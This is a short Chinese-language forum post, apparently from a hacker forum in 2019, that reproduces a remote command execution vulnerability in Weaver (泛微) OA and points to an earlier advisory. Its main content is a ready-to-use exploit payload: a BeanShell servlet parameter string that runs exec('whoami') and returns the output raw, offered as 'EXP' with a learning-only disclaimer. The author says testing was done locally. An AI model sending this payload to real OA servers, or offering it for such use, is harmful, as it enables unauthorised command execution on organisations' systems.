「复现」泛微OA远程命令执行复现(附EXP)
本帖最后由 Te5tB99 于 2019-9-20 21:05 编辑突然想说点什么,但又一时想不起要说什么,新年快乐吧。
正文:
漏洞详情请传送至
「漏洞预警」泛微OA 远程代码执行漏洞安全预警(附EXP)
https://ihonker.org/thread-29947-1-1.html
(出处: 中国红客联盟 - 08安全团队)
不讲那么多,直接步入正题了;简单明了,看图。
首先声明,因为未获得其他站点的授权,所以在本地测试。
送上EXP:
泛微oa exp
bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
附张图
声明:
此帖内容仅供学习讨论,禁止用于非法用途。如有违反法律规定,与ihonker.org无关
页:
[1]